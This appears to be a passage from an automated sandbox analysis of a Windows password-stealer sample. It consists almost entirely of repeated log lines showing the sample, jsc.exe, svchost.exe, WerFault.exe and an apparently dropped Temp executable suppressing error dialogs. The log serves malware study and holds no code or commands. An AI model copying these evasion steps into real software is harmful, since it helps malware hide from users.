                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\spczxf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
